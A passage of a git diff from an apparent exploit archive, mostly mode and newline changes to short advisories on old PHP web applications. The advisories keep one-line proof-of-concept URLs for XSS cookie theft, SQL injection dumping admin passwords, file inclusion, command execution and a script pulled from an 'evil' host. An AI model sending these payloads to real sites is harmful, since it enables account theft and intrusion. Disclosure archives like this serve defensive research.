http://www.example.com/phorum5/search.php?forum_id=0&search=1&body=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2 -034%0d%0a%0d%0a<html>Scanned by PTsecurity</html>%0d%0a&author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates=30 \ No newline at end of file +034%0d%0a%0d%0a<html>Scanned by PTsecurity</html>%0d%0a&author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates=30 \ No newline at end of file diff --git a/platforms/php/webapps/2526.txt b/platforms/php/webapps/2526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25260.txt b/platforms/php/webapps/25260.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25261.txt b/platforms/php/webapps/25261.txt old mode 100755 new mode 100644 index 52717f47b..664f885ae --- a/platforms/php/webapps/25261.txt +++ b/platforms/php/webapps/25261.txt @@ -4,4 +4,4 @@ Vortex Portal is reportedly affected by a remote PHP file include vulnerability. It is conjectured this vulnerability affects the latest release of Vortex Portal, version 2.0. -http://www.example.com/content.php?act=http://www.example.com/file \ No newline at end of file +http://www.example.com/content.php?act=http://www.example.com/file \ No newline at end of file diff --git a/platforms/php/webapps/25262.txt b/platforms/php/webapps/25262.txt old mode 100755 new mode 100644 index 5ab785ee2..08ebf3506 --- a/platforms/php/webapps/25262.txt +++ b/platforms/php/webapps/25262.txt @@ -4,4 +4,4 @@ Interspire ArticleLive 2005 is reportedly affected by a cross-site scripting vul An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/articles/newcomment?ArticleId=">&lt;script&gt;alert('hi')&lt;/script&gt; \ No newline at end of file +http://www.example.com/articles/newcomment?ArticleId=">&lt;script&gt;alert('hi')&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/25263.txt b/platforms/php/webapps/25263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25264.txt b/platforms/php/webapps/25264.txt old mode 100755 new mode 100644 index a40f9c727..497326cc9 --- a/platforms/php/webapps/25264.txt +++ b/platforms/php/webapps/25264.txt @@ -4,4 +4,4 @@ DigitalHive is reportedly affected by a cross-site scripting vulnerability. This An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/hive/base.php?page=membres.php&mt="/><script>alert()</script>1 \ No newline at end of file +http://www.example.com/hive/base.php?page=membres.php&mt="/><script>alert()</script>1 \ No newline at end of file diff --git a/platforms/php/webapps/25265.txt b/platforms/php/webapps/25265.txt old mode 100755 new mode 100644 index d0359437b..11a678915 --- a/platforms/php/webapps/25265.txt +++ b/platforms/php/webapps/25265.txt @@ -4,4 +4,4 @@ phpSysInfo is reportedly affected by multiple cross-site scripting vulnerabiliti An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/[phpSysInfo]/index.php?sensor_program=[XSS] \ No newline at end of file +http://www.example.com/[phpSysInfo]/index.php?sensor_program=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25266.txt b/platforms/php/webapps/25266.txt old mode 100755 new mode 100644 index 8fc58cf18..3cb58fe6d --- a/platforms/php/webapps/25266.txt +++ b/platforms/php/webapps/25266.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code executed in http://www.example.com/[phpSysInfo]/includes/system_footer.php?text[language]=">[XSS] http://www.example.com/[phpSysInfo]/includes/system_footer.php?text[template]=">[XSS] -http://www.example.com/[phpSysInfo]/includes/system_footer.php?hide_picklist=cXIb8O3&VERSION=[XSS] \ No newline at end of file +http://www.example.com/[phpSysInfo]/includes/system_footer.php?hide_picklist=cXIb8O3&VERSION=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25267.txt b/platforms/php/webapps/25267.txt old mode 100755 new mode 100644 index 7158f0cd6..c267c4bb8 --- a/platforms/php/webapps/25267.txt +++ b/platforms/php/webapps/25267.txt @@ -10,4 +10,4 @@ This BID will be updated when more information is available. <iframe id="frame1" name="frame1" frameborder=0 width=0 height=0 src="http://www.example.com/forums/index.php?act=Msg&CODE=04&MODE=1&entered_name=Woody&msg_title=hi&Post=I%20love%20you!"> -</iframe> \ No newline at end of file +</iframe> \ No newline at end of file diff --git a/platforms/php/webapps/2527.c b/platforms/php/webapps/2527.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25270.txt b/platforms/php/webapps/25270.txt old mode 100755 new mode 100644 index 64ecf490b..656b2621c --- a/platforms/php/webapps/25270.txt +++ b/platforms/php/webapps/25270.txt @@ -4,4 +4,4 @@ Topic Calendar is reportedly affected by a cross-site scripting vulnerability. T An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/phpbb/calendar_scheduler.php?start=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/phpbb/calendar_scheduler.php?start=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25271.txt b/platforms/php/webapps/25271.txt old mode 100755 new mode 100644 index d0b69255d..9be405b70 --- a/platforms/php/webapps/25271.txt +++ b/platforms/php/webapps/25271.txt @@ -8,4 +8,4 @@ Double Choco Latte 0.9.4.2 and prior versions are affected by the PHP code execu This BID will be updated when more information is available. -http://www.example.com/main.php?menuAction=htmlTickets.show;system(id);ob_start \ No newline at end of file +http://www.example.com/main.php?menuAction=htmlTickets.show;system(id);ob_start \ No newline at end of file diff --git a/platforms/php/webapps/25272.txt b/platforms/php/webapps/25272.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25273.txt b/platforms/php/webapps/25273.txt old mode 100755 new mode 100644 index 16f6c54de..b4aa7a7f8 --- a/platforms/php/webapps/25273.txt +++ b/platforms/php/webapps/25273.txt @@ -4,4 +4,4 @@ Koobi CMS is reportedly affected by a SQL injection vulnerability. This issue is Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/index.php?p=articles&area=[SQL Code] \ No newline at end of file +http://www.example.com/index.php?p=articles&area=[SQL Code] \ No newline at end of file diff --git a/platforms/php/webapps/25276.txt b/platforms/php/webapps/25276.txt old mode 100755 new mode 100644 index f54953cc3..5e8cadf94 --- a/platforms/php/webapps/25276.txt +++ b/platforms/php/webapps/25276.txt @@ -8,4 +8,4 @@ This issue may allow for theft of cookie-based authentication credentials or oth phpMyDirectory 10.1.3-rel is reported vulnerable, however, it is possible that other versions are affected as well. -http://www.example.com/review.php?id=1&cat=&subcat="><script src=http://evil/foo.js></script> \ No newline at end of file +http://www.example.com/review.php?id=1&cat=&subcat="><script src=http://evil/foo.js></script> \ No newline at end of file diff --git a/platforms/php/webapps/25279.txt b/platforms/php/webapps/25279.txt old mode 100755 new mode 100644 index f0e8b60ec..80e57bae2 --- a/platforms/php/webapps/25279.txt +++ b/platforms/php/webapps/25279.txt @@ -4,4 +4,4 @@ ESMI PayPal Storefront is prone to an SQL injection vulnerability. This issue is Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/hv/ecdis/products1.php?id=6&id2='SQLINJECTION&subcat=Asus&p=products1 \ No newline at end of file +http://www.example.com/hv/ecdis/products1.php?id=6&id2='SQLINJECTION&subcat=Asus&p=products1 \ No newline at end of file diff --git a/platforms/php/webapps/2528.txt b/platforms/php/webapps/2528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25280.txt b/platforms/php/webapps/25280.txt old mode 100755 new mode 100644 index 3cbc0bfd5..cd856eced --- a/platforms/php/webapps/25280.txt +++ b/platforms/php/webapps/25280.txt @@ -4,4 +4,4 @@ ESMI PayPal Storefrom is affected by a cross-site scripting vulnerability. This An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/hv/ecdis/products1h.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&id2=10&subcat=Asus&p=products1 \ No newline at end of file +http://www.example.com/hv/ecdis/products1h.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&id2=10&subcat=Asus&p=products1 \ No newline at end of file diff --git a/platforms/php/webapps/25282.txt b/platforms/php/webapps/25282.txt old mode 100755 new mode 100644 index 7c8df5913..5a4767d7f --- a/platforms/php/webapps/25282.txt +++ b/platforms/php/webapps/25282.txt @@ -5,4 +5,4 @@ Nuke Bookmarks is prone to a path disclosure issue when invalid data is submitte This issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer. http://www.example.com/modules.php?name=Bookmarks&file=marks -http://www.example.com/modules.php?name=Bookmarks&file=marks&category=1\' \ No newline at end of file +http://www.example.com/modules.php?name=Bookmarks&file=marks&category=1\' \ No newline at end of file diff --git a/platforms/php/webapps/25283.txt b/platforms/php/webapps/25283.txt old mode 100755 new mode 100644 index f4f7f5af6..7767eaf4a --- a/platforms/php/webapps/25283.txt +++ b/platforms/php/webapps/25283.txt @@ -9,4 +9,4 @@ http://www.example.com/modules.php?name=Bookmarks&file=del_mark&markname=[htmlco http://www.example.com/modules.php?name=Bookmarks&file=edit_cat&catname=[htmlcode] http://www.example.com/modules.php?name=Bookmarks&file=edit_cat&catcomment=[htmlcode] http://www.example.com/modules.php?name=Bookmarks&file=marks&catname=[htmlcode] -http://www.example.com/modules.php?name=Bookmarks&file=uploadbookmarks&category=[htmlcode] \ No newline at end of file +http://www.example.com/modules.php?name=Bookmarks&file=uploadbookmarks&category=[htmlcode] \ No newline at end of file diff --git a/platforms/php/webapps/25284.txt b/platforms/php/webapps/25284.txt old mode 100755 new mode 100644 index 101385978..c4357e705 --- a/platforms/php/webapps/25284.txt +++ b/platforms/php/webapps/25284.txt @@ -4,4 +4,4 @@ Nuke Bookmarks is prone to an SQL injection vulnerability. This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. -http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&catname=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors \ No newline at end of file +http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&catname=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors \ No newline at end of file diff --git a/platforms/php/webapps/25285.txt b/platforms/php/webapps/25285.txt old mode 100755 new mode 100644 index 5bdf84bf1..64df1a98c --- a/platforms/php/webapps/25285.txt +++ b/platforms/php/webapps/25285.txt @@ -4,4 +4,4 @@ MagicScripts E-Store Kit-2 PayPal Edition is prone to a cross-site scripting vul An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/demo/ms-pe02/downloadform.php?txn_id="><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/demo/ms-pe02/downloadform.php?txn_id="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/25286.txt b/platforms/php/webapps/25286.txt old mode 100755 new mode 100644 index 892b0a9fb..5bb503265 --- a/platforms/php/webapps/25286.txt +++ b/platforms/php/webapps/25286.txt @@ -4,4 +4,4 @@ MagicScripts E-Store Kit-2 PayPal Edition is prone to a remote file include vuln Remote attackers could potentially exploit this issue to include a remote malicious PHP script. If the attacker is able to execute the remote script it would execute in the context of the Web server hosting the vulnerable application. -http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=http://whatismyip.com&menu=http://whatismyip.com \ No newline at end of file +http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=http://whatismyip.com&menu=http://whatismyip.com \ No newline at end of file diff --git a/platforms/php/webapps/2529.txt b/platforms/php/webapps/2529.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25298.txt b/platforms/php/webapps/25298.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25299.txt b/platforms/php/webapps/25299.txt old mode 100755 new mode 100644 index d0d96b8b3..2fab73c1b --- a/platforms/php/webapps/25299.txt +++ b/platforms/php/webapps/25299.txt @@ -12,4 +12,4 @@ A successful attack may result in various attacks including theft of cookie base /shoutact.php?yousay=default&email=default&query=http://www.example.com -/shoutact.php?yousay=default&email=default&name=default&query=www.example.com \ No newline at end of file +/shoutact.php?yousay=default&email=default&name=default&query=www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/25300.txt b/platforms/php/webapps/25300.txt old mode 100755 new mode 100644 index 6750e1c63..7dd4df68b --- a/platforms/php/webapps/25300.txt +++ b/platforms/php/webapps/25300.txt @@ -8,4 +8,4 @@ http://www.example.com/modules/newbb/viewforum.php?sortname=p.post_time&sortorde Pops cookie http://www.example.com/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EPops cookie http://www.example.com/modules/newbb/index.php?viewcat='SQL_INJECTION -http://www.example.com/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9 \ No newline at end of file +http://www.example.com/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9 \ No newline at end of file diff --git a/platforms/php/webapps/25301.txt b/platforms/php/webapps/25301.txt old mode 100755 new mode 100644 index 416406d15..148419898 --- a/platforms/php/webapps/25301.txt +++ b/platforms/php/webapps/25301.txt @@ -16,4 +16,4 @@ http://www.example.com/store/search_result.php?sid= CDFE279AC2AD08522DF1CF9B4647 http://www.example.com/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang=%22%3E%3Cscript%3Ealert(docum ent.cookie)%3C/script%3E -http://www.example.com/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD \ No newline at end of file +http://www.example.com/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD \ No newline at end of file diff --git a/platforms/php/webapps/25302.txt b/platforms/php/webapps/25302.txt old mode 100755 new mode 100644 index 69149188e..80518cf78 --- a/platforms/php/webapps/25302.txt +++ b/platforms/php/webapps/25302.txt @@ -8,4 +8,4 @@ phpCoin is also affected by a local file include vulnerability. An attacker may phpCoin 1.2.1b and prior versions are affected by these issues. -http://www.example.com/auxpage.php?page=../../../some/other/file \ No newline at end of file +http://www.example.com/auxpage.php?page=../../../some/other/file \ No newline at end of file diff --git a/platforms/php/webapps/25308.txt b/platforms/php/webapps/25308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25309.txt b/platforms/php/webapps/25309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2531.txt b/platforms/php/webapps/2531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25310.txt b/platforms/php/webapps/25310.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25311.txt b/platforms/php/webapps/25311.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25312.txt b/platforms/php/webapps/25312.txt old mode 100755 new mode 100644 index 9d00aacd5..744bbf45f --- a/platforms/php/webapps/25312.txt +++ b/platforms/php/webapps/25312.txt @@ -8,4 +8,4 @@ The second set of issues are SQL injection vulnerabilities that affect the 'show An attacker may leverage these issues to carry out cross-site scripting and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks. -http://www.example.com/photos/showphoto.php?photo='SQL_ERROR \ No newline at end of file +http://www.example.com/photos/showphoto.php?photo='SQL_ERROR \ No newline at end of file diff --git a/platforms/php/webapps/25314.txt b/platforms/php/webapps/25314.txt old mode 100755 new mode 100644 index 50ceb9810..39e3d0ea2 --- a/platforms/php/webapps/25314.txt +++ b/platforms/php/webapps/25314.txt @@ -8,4 +8,4 @@ An attacker may leverage this issue to execute arbitrary server-side script code All versions of The Includer are considered to be vulnerable at the moment. This BID will be updated when more information becomes available. -http://www.example.com/index.php?page=http://www.example.com/exploit \ No newline at end of file +http://www.example.com/index.php?page=http://www.example.com/exploit \ No newline at end of file diff --git a/platforms/php/webapps/25315.html b/platforms/php/webapps/25315.html old mode 100755 new mode 100644 index 21774e3d9..acc4c7fc7 --- a/platforms/php/webapps/25315.html +++ b/platforms/php/webapps/25315.html @@ -22,4 +22,4 @@ example: <script>document.write(document.cookie)</script></p> <p>&nbsp;</p> <p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/php/webapps/25316.txt b/platforms/php/webapps/25316.txt old mode 100755 new mode 100644 index a9f674e15..a2ac88e42 --- a/platforms/php/webapps/25316.txt +++ b/platforms/php/webapps/25316.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code executed in http://www.example.com/index.php?name=Your_Account&profile=anyone"><script>alert('foo')</script> -http://www.example.com/coppermine/displayimage/meta=lastcom/cat=0"><script>alert('foo')</script>/pos=0.html \ No newline at end of file +http://www.example.com/coppermine/displayimage/meta=lastcom/cat=0"><script>alert('foo')</script>/pos=0.html \ No newline at end of file diff --git a/platforms/php/webapps/25317.txt b/platforms/php/webapps/25317.txt old mode 100755 new mode 100644 index 5d8de71f7..9283cec91 --- a/platforms/php/webapps/25317.txt +++ b/platforms/php/webapps/25317.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Ublog 1.0.4 and prior versions are reportedly affected by this issue. -http://www.example.com/login.asp?msg=<script>alert(XSS)</script> \ No newline at end of file +http://www.example.com/login.asp?msg=<script>alert(XSS)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2532.txt b/platforms/php/webapps/2532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25320.txt b/platforms/php/webapps/25320.txt old mode 100755 new mode 100644 index e7c208d2b..0e7ab56d6 --- a/platforms/php/webapps/25320.txt +++ b/platforms/php/webapps/25320.txt @@ -6,4 +6,4 @@ This vulnerability could permit remote attackers to pass malicious input to data Squirrelcart 1.5.5 and prior versions are vulnerable to this issue. -http://www.example.com/index.php?crn='SQL_INJECTION&action=show&show_products_mode=cat_click&PHPSESSID=2069dbe1646bdc46e4e78718e76e6d15 \ No newline at end of file +http://www.example.com/index.php?crn='SQL_INJECTION&action=show&show_products_mode=cat_click&PHPSESSID=2069dbe1646bdc46e4e78718e76e6d15 \ No newline at end of file diff --git a/platforms/php/webapps/25323.txt b/platforms/php/webapps/25323.txt old mode 100755 new mode 100644 index 082512ded..b102e7142 --- a/platforms/php/webapps/25323.txt +++ b/platforms/php/webapps/25323.txt @@ -8,4 +8,4 @@ Successful exploitation could result in a compromise of security properties of t InterAKT Online MX Shop version 1.1.1 is reported prone to these issues; other versions might also be affected. -http://localhost/MXShop/?mod=category&id_ctg='SQL_INJECTION&PHPSESSID=b1267b894a93572928850920df08126d \ No newline at end of file +http://localhost/MXShop/?mod=category&id_ctg='SQL_INJECTION&PHPSESSID=b1267b894a93572928850920df08126d \ No newline at end of file diff --git a/platforms/php/webapps/25327.txt b/platforms/php/webapps/25327.txt old mode 100755 new mode 100644 index b97f365b9..9e2a96865 --- a/platforms/php/webapps/25327.txt +++ b/platforms/php/webapps/25327.txt @@ -8,4 +8,4 @@ An attacker may leverage this issue to execute arbitrary server-side script code EPay Pro version 2.0 is vulnerable to this issue. -http://www.example.com/epal/index.php?view=http://www.example.com/ \ No newline at end of file +http://www.example.com/epal/index.php?view=http://www.example.com/ \ No newline at end of file diff --git a/platforms/php/webapps/25328.txt b/platforms/php/webapps/25328.txt old mode 100755 new mode 100644 index 485f011a5..3b919c328 --- a/platforms/php/webapps/25328.txt +++ b/platforms/php/webapps/25328.txt @@ -12,4 +12,4 @@ http://www.example.com/epal/?order_num=crap&payment=">&lt;script&gt;alert(docume Pops cookie http://www.example.com/epal/?order_num=crap&payment=crap&send=first&send=regular&send=priority&send='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -Pops cookie \ No newline at end of file +Pops cookie \ No newline at end of file diff --git a/platforms/php/webapps/2533.txt b/platforms/php/webapps/2533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25330.txt b/platforms/php/webapps/25330.txt old mode 100755 new mode 100644 index 5feb1322f..2eb80930a --- a/platforms/php/webapps/25330.txt +++ b/platforms/php/webapps/25330.txt @@ -6,4 +6,4 @@ phpMyAdmin versions prior to 2.6.2-rc1 are affected by this issue. http://www.example.com/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><script>alert(document.cookie)</script> -http://www.example.com/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1> \ No newline at end of file +http://www.example.com/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1> \ No newline at end of file diff --git a/platforms/php/webapps/25337.txt b/platforms/php/webapps/25337.txt old mode 100755 new mode 100644 index 77c8efab4..2e6b366aa --- a/platforms/php/webapps/25337.txt +++ b/platforms/php/webapps/25337.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th PayProCart version 3.0 is affected by this issue. Other versions may be affected as well. -http://www.example.com/usrdetails.php?sgnuptype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/usrdetails.php?sgnuptype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25338.txt b/platforms/php/webapps/25338.txt old mode 100755 new mode 100644 index c2f89c3e6..5034f6a16 --- a/platforms/php/webapps/25338.txt +++ b/platforms/php/webapps/25338.txt @@ -8,4 +8,4 @@ Reportedly, the attacker can gain access to file owned by the administrator and PayProCart versions 3.0 is affected by this issue. Other versions may be affected as well. -http://www.example.com/adminshop/index.php?proMod=index&amp%3bftoedit=..%2fshopincs%2fmaintopENG \ No newline at end of file +http://www.example.com/adminshop/index.php?proMod=index&amp%3bftoedit=..%2fshopincs%2fmaintopENG \ No newline at end of file diff --git a/platforms/php/webapps/25339.txt b/platforms/php/webapps/25339.txt old mode 100755 new mode 100644 index 3962f19b8..f8a36a4a4 --- a/platforms/php/webapps/25339.txt +++ b/platforms/php/webapps/25339.txt @@ -11,4 +11,4 @@ This vulnerability is reported to affect PHP-Nuke version 7.6 and previous versi http://www.example.com/[nuke_dir]/modules.php?name=Your_Account&op=mailpasswd&username=[XSS] The following proof of concept example supplied by Maksymilian Arciemowicz: -http://www.example.com/[nuke_dir]/modules.php?name=Your_Account&op=userinfo&bypass=1&username=[XSS] \ No newline at end of file +http://www.example.com/[nuke_dir]/modules.php?name=Your_Account&op=userinfo&bypass=1&username=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25340.txt b/platforms/php/webapps/25340.txt old mode 100755 new mode 100644 index 8bafad284..5a50b7e2e --- a/platforms/php/webapps/25340.txt +++ b/platforms/php/webapps/25340.txt @@ -8,4 +8,4 @@ This issue could permit a remote attacker to create a malicious URI link that in This vulnerability is reported to affect PHP-Nuke version 7.6 and previous versions. -http://www.example.com/[nuke_dir]/modules.php?name=Your_Account&op=avatarlist&avatarcategory=[XSS] \ No newline at end of file +http://www.example.com/[nuke_dir]/modules.php?name=Your_Account&op=avatarlist&avatarcategory=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25341.html b/platforms/php/webapps/25341.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25342.txt b/platforms/php/webapps/25342.txt old mode 100755 new mode 100644 index 66551c208..c0d5a63ed --- a/platforms/php/webapps/25342.txt +++ b/platforms/php/webapps/25342.txt @@ -9,4 +9,4 @@ http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=MostPopular&ra http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=viewlinkdetails&ttitle=[XSS] http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=viewlinkeditorial&ttitle=[XSS] http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=viewlinkcomments&ttitle=[XSS] -http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=ratelink&ttitle=[XSS] \ No newline at end of file +http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=ratelink&ttitle=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25343.txt b/platforms/php/webapps/25343.txt old mode 100755 new mode 100644 index 9d219cb87..e21dfccf9 --- a/platforms/php/webapps/25343.txt +++ b/platforms/php/webapps/25343.txt @@ -4,4 +4,4 @@ PHP-Nuke is reportedly affected by a cross-site scripting vulnerability. This is An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/[php-nuke]/banners.php?op=EmailStats&name=sex&bid=[XSS] \ No newline at end of file +http://www.example.com/[php-nuke]/banners.php?op=EmailStats&name=sex&bid=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25344.txt b/platforms/php/webapps/25344.txt old mode 100755 new mode 100644 index 12381df97..ff4c52b5f --- a/platforms/php/webapps/25344.txt +++ b/platforms/php/webapps/25344.txt @@ -4,4 +4,4 @@ The DLMan Pro mod for phpBB is reportedly affected by an SQL Injection vulnerabi Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/[phpBB]/dlman.php?func=file_info&file_id='[SQL Injection] \ No newline at end of file +http://www.example.com/[phpBB]/dlman.php?func=file_info&file_id='[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/25345.txt b/platforms/php/webapps/25345.txt old mode 100755 new mode 100644 index 04251e6a0..f53e28e6d --- a/platforms/php/webapps/25345.txt +++ b/platforms/php/webapps/25345.txt @@ -4,4 +4,4 @@ The Linkz Pro mod for phpBB is reportedly affected by a SQL injection vulnerabil Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/[phpBB]/links.php?func=show&id='[SQL Injection] \ No newline at end of file +http://www.example.com/[phpBB]/links.php?func=show&id='[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/2535.txt b/platforms/php/webapps/2535.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25354.txt b/platforms/php/webapps/25354.txt old mode 100755 new mode 100644 index 3231647a7..474bac8f8 --- a/platforms/php/webapps/25354.txt +++ b/platforms/php/webapps/25354.txt @@ -4,4 +4,4 @@ Ocean12 Membership Manager Pro is reportedly affected by a cross-site scripting An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10 \ No newline at end of file +http://www.example.com/main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10 \ No newline at end of file diff --git a/platforms/php/webapps/25355.txt b/platforms/php/webapps/25355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25356.txt b/platforms/php/webapps/25356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25357.txt b/platforms/php/webapps/25357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25358.txt b/platforms/php/webapps/25358.txt old mode 100755 new mode 100644 index 07428bc36..2cde36e40 --- a/platforms/php/webapps/25358.txt +++ b/platforms/php/webapps/25358.txt @@ -8,4 +8,4 @@ These vulnerabilities could permit remote attackers to pass malicious input to d Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. This is not confirmed. -http://www.example.com/view_product.php?product=' \ No newline at end of file +http://www.example.com/view_product.php?product=' \ No newline at end of file diff --git a/platforms/php/webapps/2536.txt b/platforms/php/webapps/2536.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25360.txt b/platforms/php/webapps/25360.txt old mode 100755 new mode 100644 index db7526941..61df7657d --- a/platforms/php/webapps/25360.txt +++ b/platforms/php/webapps/25360.txt @@ -9,4 +9,4 @@ These issues are reported to affect PHP-Nuke version 7.6; earlier versions may a http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=modifylinkrequestS&url='[SQL] http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=viewlink&orderby=[SQL]&min=[SQL] http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=search&query=sex&orderby=[SQL]&min=[SQL]&show=[SQL] -http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=[SQL]&ratetype=num \ No newline at end of file +http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=[SQL]&ratetype=num \ No newline at end of file diff --git a/platforms/php/webapps/25366.txt b/platforms/php/webapps/25366.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25367.txt b/platforms/php/webapps/25367.txt old mode 100755 new mode 100644 index fc3799888..b4d66f369 --- a/platforms/php/webapps/25367.txt +++ 